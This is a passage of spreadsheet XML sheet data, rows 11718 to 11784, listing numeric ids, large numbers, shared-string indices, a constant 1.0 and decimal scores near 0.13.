    <row r="11718" ht="15.75" customHeight="1">
      <c r="A11718" s="1">
        <v>5473.0</v>
      </c>
      <c r="B11718" s="2">
        <v>4.571217E7</v>
      </c>
      <c r="C11718" s="2" t="s">
        <v>11248</v>
      </c>
      <c r="D11718" s="2">
        <v>1.0</v>
      </c>
      <c r="E11718" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11718" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="11719" ht="15.75" customHeight="1">
      <c r="A11719" s="1">
        <v>5149.0</v>
      </c>
      <c r="B11719" s="2">
        <v>4.4684327E7</v>
      </c>
      <c r="C11719" s="2" t="s">
        <v>11249</v>
      </c>
      <c r="D11719" s="2">
        <v>1.0</v>
      </c>
      <c r="E11719" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11719" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11720" ht="15.75" customHeight="1">
      <c r="A11720" s="1">
        <v>5845.0</v>
      </c>
      <c r="B11720" s="2">
        <v>4.6923988E7</v>
      </c>
      <c r="C11720" s="2" t="s">
        <v>11250</v>
      </c>
      <c r="D11720" s="2">
        <v>1.0</v>
      </c>
      <c r="E11720" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11720" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11721" ht="15.75" customHeight="1">
      <c r="A11721" s="1">
        <v>6290.0</v>
      </c>
      <c r="B11721" s="2">
        <v>4.8194894E7</v>
      </c>
      <c r="C11721" s="2" t="s">
        <v>11251</v>
      </c>
      <c r="D11721" s="2">
        <v>1.0</v>
      </c>
      <c r="E11721" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11721" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11722" ht="15.75" customHeight="1">
      <c r="A11722" s="1">
        <v>7375.0</v>
      </c>
      <c r="B11722" s="2">
        <v>5.1041601E7</v>
      </c>
      <c r="C11722" s="2" t="s">
        <v>11252</v>
      </c>
      <c r="D11722" s="2">
        <v>1.0</v>
      </c>
      <c r="E11722" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11722" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11723" ht="15.75" customHeight="1">
      <c r="A11723" s="1">
        <v>8516.0</v>
      </c>
      <c r="B11723" s="2">
        <v>5.4067421E7</v>
      </c>
      <c r="C11723" s="2" t="s">
        <v>11253</v>
      </c>
      <c r="D11723" s="2">
        <v>1.0</v>
      </c>
      <c r="E11723" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11723" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11724" ht="15.75" customHeight="1">
      <c r="A11724" s="1">
        <v>9631.0</v>
      </c>
      <c r="B11724" s="2">
        <v>5.6225562E7</v>
      </c>
      <c r="C11724" s="2" t="s">
        <v>11254</v>
      </c>
      <c r="D11724" s="2">
        <v>1.0</v>
      </c>
      <c r="E11724" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11724" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11725" ht="15.75" customHeight="1">
      <c r="A11725" s="1">
        <v>14172.0</v>
      </c>
      <c r="B11725" s="2">
        <v>3.8056936E7</v>
      </c>
      <c r="C11725" s="2" t="s">
        <v>11255</v>
      </c>
      <c r="D11725" s="2">
        <v>1.0</v>
      </c>
      <c r="E11725" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11725" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11726" ht="15.75" customHeight="1">
      <c r="A11726" s="1">
        <v>17496.0</v>
      </c>
      <c r="B11726" s="2">
        <v>4.9998004E7</v>
      </c>
      <c r="C11726" s="2" t="s">
        <v>11256</v>
      </c>
      <c r="D11726" s="2">
        <v>1.0</v>
      </c>
      <c r="E11726" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11726" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11727" ht="15.75" customHeight="1">
      <c r="A11727" s="1">
        <v>18019.0</v>
      </c>
      <c r="B11727" s="2">
        <v>5.1508577E7</v>
      </c>
      <c r="C11727" s="2" t="s">
        <v>11257</v>
      </c>
      <c r="D11727" s="2">
        <v>1.0</v>
      </c>
      <c r="E11727" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11727" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11728" ht="15.75" customHeight="1">
      <c r="A11728" s="1">
        <v>18673.0</v>
      </c>
      <c r="B11728" s="2">
        <v>5.3550169E7</v>
      </c>
      <c r="C11728" s="2" t="s">
        <v>11258</v>
      </c>
      <c r="D11728" s="2">
        <v>1.0</v>
      </c>
      <c r="E11728" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11728" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11729" ht="15.75" customHeight="1">
      <c r="A11729" s="1">
        <v>19210.0</v>
      </c>
      <c r="B11729" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C11729" s="2" t="s">
        <v>11259</v>
      </c>
      <c r="D11729" s="2">
        <v>1.0</v>
      </c>
      <c r="E11729" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11729" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11730" ht="15.75" customHeight="1">
      <c r="A11730" s="1">
        <v>23496.0</v>
      </c>
      <c r="B11730" s="2">
        <v>5.7601397E7</v>
      </c>
      <c r="C11730" s="2" t="s">
        <v>11260</v>
      </c>
      <c r="D11730" s="2">
        <v>1.0</v>
      </c>
      <c r="E11730" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11730" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11731" ht="15.75" customHeight="1">
      <c r="A11731" s="1">
        <v>31155.0</v>
      </c>
      <c r="B11731" s="2">
        <v>4.8982178E7</v>
      </c>
      <c r="C11731" s="2" t="s">
        <v>11261</v>
      </c>
      <c r="D11731" s="2">
        <v>1.0</v>
      </c>
      <c r="E11731" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11731" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="11732" ht="15.75" customHeight="1">
      <c r="A11732" s="1">
        <v>4646.0</v>
      </c>
      <c r="B11732" s="2">
        <v>4.3064819E7</v>
      </c>
      <c r="C11732" s="2" t="s">
        <v>11262</v>
      </c>
      <c r="D11732" s="2">
        <v>1.0</v>
      </c>
      <c r="E11732" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11732" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="11733" ht="15.75" customHeight="1">
      <c r="A11733" s="1">
        <v>18968.0</v>
      </c>
      <c r="B11733" s="2">
        <v>5.4362332E7</v>
      </c>
      <c r="C11733" s="2" t="s">
        <v>11263</v>
      </c>
      <c r="D11733" s="2">
        <v>1.0</v>
      </c>
      <c r="E11733" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11733" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="11734" ht="15.75" customHeight="1">
      <c r="A11734" s="1">
        <v>6292.0</v>
      </c>
      <c r="B11734" s="2">
        <v>4.8206611E7</v>
      </c>
      <c r="C11734" s="2" t="s">
        <v>11264</v>
      </c>
      <c r="D11734" s="2">
        <v>1.0</v>
      </c>
      <c r="E11734" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11734" s="2">
        <v>0.1313932980599647</v>
      </c>
    </row>
    <row r="11735" ht="15.75" customHeight="1">
      <c r="A11735" s="1">
        <v>13758.0</v>
      </c>
      <c r="B11735" s="2">
        <v>3.6506028E7</v>
      </c>
      <c r="C11735" s="2" t="s">
        <v>11265</v>
      </c>
      <c r="D11735" s="2">
        <v>1.0</v>
      </c>
      <c r="E11735" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11735" s="2">
        <v>0.1313813813813814</v>
      </c>
    </row>
    <row r="11736" ht="15.75" customHeight="1">
      <c r="A11736" s="1">
        <v>3732.0</v>
      </c>
      <c r="B11736" s="2">
        <v>3.9655018E7</v>
      </c>
      <c r="C11736" s="2" t="s">
        <v>11266</v>
      </c>
      <c r="D11736" s="2">
        <v>1.0</v>
      </c>
      <c r="E11736" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11736" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="11737" ht="15.75" customHeight="1">
      <c r="A11737" s="1">
        <v>14432.0</v>
      </c>
      <c r="B11737" s="2">
        <v>3.9265777E7</v>
      </c>
      <c r="C11737" s="2" t="s">
        <v>11267</v>
      </c>
      <c r="D11737" s="2">
        <v>1.0</v>
      </c>
      <c r="E11737" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11737" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="11738" ht="15.75" customHeight="1">
      <c r="A11738" s="1">
        <v>2297.0</v>
      </c>
      <c r="B11738" s="2">
        <v>3.2663415E7</v>
      </c>
      <c r="C11738" s="2" t="s">
        <v>11268</v>
      </c>
      <c r="D11738" s="2">
        <v>1.0</v>
      </c>
      <c r="E11738" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11738" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="11739" ht="15.75" customHeight="1">
      <c r="A11739" s="1">
        <v>18252.0</v>
      </c>
      <c r="B11739" s="2">
        <v>5.216721E7</v>
      </c>
      <c r="C11739" s="2" t="s">
        <v>11269</v>
      </c>
      <c r="D11739" s="2">
        <v>1.0</v>
      </c>
      <c r="E11739" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11739" s="2">
        <v>0.130952380952381</v>
      </c>
    </row>
    <row r="11740" ht="15.75" customHeight="1">
      <c r="A11740" s="1">
        <v>3525.0</v>
      </c>
      <c r="B11740" s="2">
        <v>3.8609936E7</v>
      </c>
      <c r="C11740" s="2" t="s">
        <v>11270</v>
      </c>
      <c r="D11740" s="2">
        <v>1.0</v>
      </c>
      <c r="E11740" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11740" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="11741" ht="15.75" customHeight="1">
      <c r="A11741" s="1">
        <v>10876.0</v>
      </c>
      <c r="B11741" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C11741" s="2" t="s">
        <v>11271</v>
      </c>
      <c r="D11741" s="2">
        <v>1.0</v>
      </c>
      <c r="E11741" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11741" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="11742" ht="15.75" customHeight="1">
      <c r="A11742" s="1">
        <v>14784.0</v>
      </c>
      <c r="B11742" s="2">
        <v>4.0912031E7</v>
      </c>
      <c r="C11742" s="2" t="s">
        <v>11272</v>
      </c>
      <c r="D11742" s="2">
        <v>1.0</v>
      </c>
      <c r="E11742" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11742" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="11743" ht="15.75" customHeight="1">
      <c r="A11743" s="1">
        <v>17409.0</v>
      </c>
      <c r="B11743" s="2">
        <v>4.9658726E7</v>
      </c>
      <c r="C11743" s="2" t="s">
        <v>11273</v>
      </c>
      <c r="D11743" s="2">
        <v>1.0</v>
      </c>
      <c r="E11743" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11743" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="11744" ht="15.75" customHeight="1">
      <c r="A11744" s="1">
        <v>30704.0</v>
      </c>
      <c r="B11744" s="2">
        <v>4263917.0</v>
      </c>
      <c r="C11744" s="2" t="s">
        <v>11274</v>
      </c>
      <c r="D11744" s="2">
        <v>1.0</v>
      </c>
      <c r="E11744" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11744" s="2">
        <v>0.1308479532163743</v>
      </c>
    </row>
    <row r="11745" ht="15.75" customHeight="1">
      <c r="A11745" s="1">
        <v>14998.0</v>
      </c>
      <c r="B11745" s="2">
        <v>4.1449362E7</v>
      </c>
      <c r="C11745" s="2" t="s">
        <v>11275</v>
      </c>
      <c r="D11745" s="2">
        <v>1.0</v>
      </c>
      <c r="E11745" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11745" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11746" ht="15.75" customHeight="1">
      <c r="A11746" s="1">
        <v>17690.0</v>
      </c>
      <c r="B11746" s="2">
        <v>5.0505056E7</v>
      </c>
      <c r="C11746" s="2" t="s">
        <v>11276</v>
      </c>
      <c r="D11746" s="2">
        <v>1.0</v>
      </c>
      <c r="E11746" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11746" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11747" ht="15.75" customHeight="1">
      <c r="A11747" s="1">
        <v>23223.0</v>
      </c>
      <c r="B11747" s="2">
        <v>5279557.0</v>
      </c>
      <c r="C11747" s="2" t="s">
        <v>11277</v>
      </c>
      <c r="D11747" s="2">
        <v>1.0</v>
      </c>
      <c r="E11747" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11747" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11748" ht="15.75" customHeight="1">
      <c r="A11748" s="1">
        <v>23316.0</v>
      </c>
      <c r="B11748" s="2">
        <v>5.4279722E7</v>
      </c>
      <c r="C11748" s="2" t="s">
        <v>11278</v>
      </c>
      <c r="D11748" s="2">
        <v>1.0</v>
      </c>
      <c r="E11748" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11748" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11749" ht="15.75" customHeight="1">
      <c r="A11749" s="1">
        <v>24975.0</v>
      </c>
      <c r="B11749" s="2">
        <v>1.2675442E7</v>
      </c>
      <c r="C11749" s="2" t="s">
        <v>11279</v>
      </c>
      <c r="D11749" s="2">
        <v>1.0</v>
      </c>
      <c r="E11749" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11749" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11750" ht="15.75" customHeight="1">
      <c r="A11750" s="1">
        <v>31858.0</v>
      </c>
      <c r="B11750" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C11750" s="2" t="s">
        <v>11277</v>
      </c>
      <c r="D11750" s="2">
        <v>1.0</v>
      </c>
      <c r="E11750" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11750" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11751" ht="15.75" customHeight="1">
      <c r="A11751" s="1">
        <v>33888.0</v>
      </c>
      <c r="B11751" s="2">
        <v>9173246.0</v>
      </c>
      <c r="C11751" s="2" t="s">
        <v>11280</v>
      </c>
      <c r="D11751" s="2">
        <v>1.0</v>
      </c>
      <c r="E11751" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11751" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="11752" ht="15.75" customHeight="1">
      <c r="A11752" s="1">
        <v>13735.0</v>
      </c>
      <c r="B11752" s="2">
        <v>3.6419187E7</v>
      </c>
      <c r="C11752" s="2" t="s">
        <v>11281</v>
      </c>
      <c r="D11752" s="2">
        <v>1.0</v>
      </c>
      <c r="E11752" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11752" s="2">
        <v>0.1304713804713805</v>
      </c>
    </row>
    <row r="11753" ht="15.75" customHeight="1">
      <c r="A11753" s="1">
        <v>1181.0</v>
      </c>
      <c r="B11753" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C11753" s="2" t="s">
        <v>11282</v>
      </c>
      <c r="D11753" s="2">
        <v>1.0</v>
      </c>
      <c r="E11753" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11753" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11754" ht="15.75" customHeight="1">
      <c r="A11754" s="1">
        <v>5948.0</v>
      </c>
      <c r="B11754" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C11754" s="2" t="s">
        <v>11283</v>
      </c>
      <c r="D11754" s="2">
        <v>1.0</v>
      </c>
      <c r="E11754" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11754" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11755" ht="15.75" customHeight="1">
      <c r="A11755" s="1">
        <v>6599.0</v>
      </c>
      <c r="B11755" s="2">
        <v>4.9012644E7</v>
      </c>
      <c r="C11755" s="2" t="s">
        <v>11284</v>
      </c>
      <c r="D11755" s="2">
        <v>1.0</v>
      </c>
      <c r="E11755" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11755" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11756" ht="15.75" customHeight="1">
      <c r="A11756" s="1">
        <v>6754.0</v>
      </c>
      <c r="B11756" s="2">
        <v>4.9389255E7</v>
      </c>
      <c r="C11756" s="2" t="s">
        <v>11285</v>
      </c>
      <c r="D11756" s="2">
        <v>1.0</v>
      </c>
      <c r="E11756" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11756" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11757" ht="15.75" customHeight="1">
      <c r="A11757" s="1">
        <v>7534.0</v>
      </c>
      <c r="B11757" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C11757" s="2" t="s">
        <v>11286</v>
      </c>
      <c r="D11757" s="2">
        <v>1.0</v>
      </c>
      <c r="E11757" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11757" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11758" ht="15.75" customHeight="1">
      <c r="A11758" s="1">
        <v>7977.0</v>
      </c>
      <c r="B11758" s="2">
        <v>5.2711703E7</v>
      </c>
      <c r="C11758" s="2" t="s">
        <v>11287</v>
      </c>
      <c r="D11758" s="2">
        <v>1.0</v>
      </c>
      <c r="E11758" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11758" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11759" ht="15.75" customHeight="1">
      <c r="A11759" s="1">
        <v>8414.0</v>
      </c>
      <c r="B11759" s="2">
        <v>5.3909704E7</v>
      </c>
      <c r="C11759" s="2" t="s">
        <v>11288</v>
      </c>
      <c r="D11759" s="2">
        <v>1.0</v>
      </c>
      <c r="E11759" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11759" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11760" ht="15.75" customHeight="1">
      <c r="A11760" s="1">
        <v>8543.0</v>
      </c>
      <c r="B11760" s="2">
        <v>5.4138753E7</v>
      </c>
      <c r="C11760" s="2" t="s">
        <v>11289</v>
      </c>
      <c r="D11760" s="2">
        <v>1.0</v>
      </c>
      <c r="E11760" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11760" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11761" ht="15.75" customHeight="1">
      <c r="A11761" s="1">
        <v>8546.0</v>
      </c>
      <c r="B11761" s="2">
        <v>5.4138753E7</v>
      </c>
      <c r="C11761" s="2" t="s">
        <v>11290</v>
      </c>
      <c r="D11761" s="2">
        <v>1.0</v>
      </c>
      <c r="E11761" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11761" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11762" ht="15.75" customHeight="1">
      <c r="A11762" s="1">
        <v>8627.0</v>
      </c>
      <c r="B11762" s="2">
        <v>5.4307406E7</v>
      </c>
      <c r="C11762" s="2" t="s">
        <v>11291</v>
      </c>
      <c r="D11762" s="2">
        <v>1.0</v>
      </c>
      <c r="E11762" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11762" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11763" ht="15.75" customHeight="1">
      <c r="A11763" s="1">
        <v>8861.0</v>
      </c>
      <c r="B11763" s="2">
        <v>5.4742613E7</v>
      </c>
      <c r="C11763" s="2" t="s">
        <v>11292</v>
      </c>
      <c r="D11763" s="2">
        <v>1.0</v>
      </c>
      <c r="E11763" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11763" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11764" ht="15.75" customHeight="1">
      <c r="A11764" s="1">
        <v>9085.0</v>
      </c>
      <c r="B11764" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C11764" s="2" t="s">
        <v>11293</v>
      </c>
      <c r="D11764" s="2">
        <v>1.0</v>
      </c>
      <c r="E11764" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11764" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11765" ht="15.75" customHeight="1">
      <c r="A11765" s="1">
        <v>9377.0</v>
      </c>
      <c r="B11765" s="2">
        <v>5.5708664E7</v>
      </c>
      <c r="C11765" s="2" t="s">
        <v>11294</v>
      </c>
      <c r="D11765" s="2">
        <v>1.0</v>
      </c>
      <c r="E11765" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11765" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11766" ht="15.75" customHeight="1">
      <c r="A11766" s="1">
        <v>11520.0</v>
      </c>
      <c r="B11766" s="2">
        <v>2.2345541E7</v>
      </c>
      <c r="C11766" s="2" t="s">
        <v>11295</v>
      </c>
      <c r="D11766" s="2">
        <v>1.0</v>
      </c>
      <c r="E11766" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11766" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11767" ht="15.75" customHeight="1">
      <c r="A11767" s="1">
        <v>12562.0</v>
      </c>
      <c r="B11767" s="2">
        <v>2.9939308E7</v>
      </c>
      <c r="C11767" s="2" t="s">
        <v>11296</v>
      </c>
      <c r="D11767" s="2">
        <v>1.0</v>
      </c>
      <c r="E11767" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11767" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11768" ht="15.75" customHeight="1">
      <c r="A11768" s="1">
        <v>15122.0</v>
      </c>
      <c r="B11768" s="2">
        <v>4.1886026E7</v>
      </c>
      <c r="C11768" s="2" t="s">
        <v>11297</v>
      </c>
      <c r="D11768" s="2">
        <v>1.0</v>
      </c>
      <c r="E11768" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11768" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11769" ht="15.75" customHeight="1">
      <c r="A11769" s="1">
        <v>16013.0</v>
      </c>
      <c r="B11769" s="2">
        <v>4.5017423E7</v>
      </c>
      <c r="C11769" s="2" t="s">
        <v>11298</v>
      </c>
      <c r="D11769" s="2">
        <v>1.0</v>
      </c>
      <c r="E11769" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11769" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11770" ht="15.75" customHeight="1">
      <c r="A11770" s="1">
        <v>17267.0</v>
      </c>
      <c r="B11770" s="2">
        <v>4.9163201E7</v>
      </c>
      <c r="C11770" s="2" t="s">
        <v>11299</v>
      </c>
      <c r="D11770" s="2">
        <v>1.0</v>
      </c>
      <c r="E11770" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11770" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11771" ht="15.75" customHeight="1">
      <c r="A11771" s="1">
        <v>17475.0</v>
      </c>
      <c r="B11771" s="2">
        <v>4.993195E7</v>
      </c>
      <c r="C11771" s="2" t="s">
        <v>11300</v>
      </c>
      <c r="D11771" s="2">
        <v>1.0</v>
      </c>
      <c r="E11771" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11771" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11772" ht="15.75" customHeight="1">
      <c r="A11772" s="1">
        <v>17479.0</v>
      </c>
      <c r="B11772" s="2">
        <v>4.9933214E7</v>
      </c>
      <c r="C11772" s="2" t="s">
        <v>11301</v>
      </c>
      <c r="D11772" s="2">
        <v>1.0</v>
      </c>
      <c r="E11772" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11772" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11773" ht="15.75" customHeight="1">
      <c r="A11773" s="1">
        <v>18375.0</v>
      </c>
      <c r="B11773" s="2">
        <v>5.2577789E7</v>
      </c>
      <c r="C11773" s="2" t="s">
        <v>11302</v>
      </c>
      <c r="D11773" s="2">
        <v>1.0</v>
      </c>
      <c r="E11773" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11773" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11774" ht="15.75" customHeight="1">
      <c r="A11774" s="1">
        <v>19212.0</v>
      </c>
      <c r="B11774" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C11774" s="2" t="s">
        <v>11303</v>
      </c>
      <c r="D11774" s="2">
        <v>1.0</v>
      </c>
      <c r="E11774" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11774" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11775" ht="15.75" customHeight="1">
      <c r="A11775" s="1">
        <v>19447.0</v>
      </c>
      <c r="B11775" s="2">
        <v>5.5729674E7</v>
      </c>
      <c r="C11775" s="2" t="s">
        <v>11304</v>
      </c>
      <c r="D11775" s="2">
        <v>1.0</v>
      </c>
      <c r="E11775" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11775" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11776" ht="15.75" customHeight="1">
      <c r="A11776" s="1">
        <v>19497.0</v>
      </c>
      <c r="B11776" s="2">
        <v>5.5904605E7</v>
      </c>
      <c r="C11776" s="2" t="s">
        <v>11305</v>
      </c>
      <c r="D11776" s="2">
        <v>1.0</v>
      </c>
      <c r="E11776" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11776" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11777" ht="15.75" customHeight="1">
      <c r="A11777" s="1">
        <v>19841.0</v>
      </c>
      <c r="B11777" s="2">
        <v>5.7079864E7</v>
      </c>
      <c r="C11777" s="2" t="s">
        <v>11306</v>
      </c>
      <c r="D11777" s="2">
        <v>1.0</v>
      </c>
      <c r="E11777" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11777" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11778" ht="15.75" customHeight="1">
      <c r="A11778" s="1">
        <v>22531.0</v>
      </c>
      <c r="B11778" s="2">
        <v>3.7844137E7</v>
      </c>
      <c r="C11778" s="2" t="s">
        <v>11307</v>
      </c>
      <c r="D11778" s="2">
        <v>1.0</v>
      </c>
      <c r="E11778" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11778" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11779" ht="15.75" customHeight="1">
      <c r="A11779" s="1">
        <v>24163.0</v>
      </c>
      <c r="B11779" s="2">
        <v>1.0155689E7</v>
      </c>
      <c r="C11779" s="2" t="s">
        <v>11308</v>
      </c>
      <c r="D11779" s="2">
        <v>1.0</v>
      </c>
      <c r="E11779" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11779" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11780" ht="15.75" customHeight="1">
      <c r="A11780" s="1">
        <v>25525.0</v>
      </c>
      <c r="B11780" s="2">
        <v>1.4221037E7</v>
      </c>
      <c r="C11780" s="2" t="s">
        <v>11309</v>
      </c>
      <c r="D11780" s="2">
        <v>1.0</v>
      </c>
      <c r="E11780" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11780" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11781" ht="15.75" customHeight="1">
      <c r="A11781" s="1">
        <v>27067.0</v>
      </c>
      <c r="B11781" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C11781" s="2" t="s">
        <v>11310</v>
      </c>
      <c r="D11781" s="2">
        <v>1.0</v>
      </c>
      <c r="E11781" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11781" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11782" ht="15.75" customHeight="1">
      <c r="A11782" s="1">
        <v>28009.0</v>
      </c>
      <c r="B11782" s="2">
        <v>2.4335313E7</v>
      </c>
      <c r="C11782" s="5" t="s">
        <v>11311</v>
      </c>
      <c r="D11782" s="2">
        <v>1.0</v>
      </c>
      <c r="E11782" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11782" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11783" ht="15.75" customHeight="1">
      <c r="A11783" s="1">
        <v>28521.0</v>
      </c>
      <c r="B11783" s="2">
        <v>2.6756545E7</v>
      </c>
      <c r="C11783" s="2" t="s">
        <v>11312</v>
      </c>
      <c r="D11783" s="2">
        <v>1.0</v>
      </c>
      <c r="E11783" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11783" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="11784" ht="15.75" customHeight="1">
      <c r="A11784" s="1">
        <v>29413.0</v>
      </c>
      <c r="B11784" s="2">
        <v>3.2096738E7</v>
      </c>
      <c r="C11784" s="2" t="s">
        <v>11313</v>
      </c>
      <c r="D11784" s="2">
        <v>1.0</v>
      </c>
      <c r="E11784" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11784" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
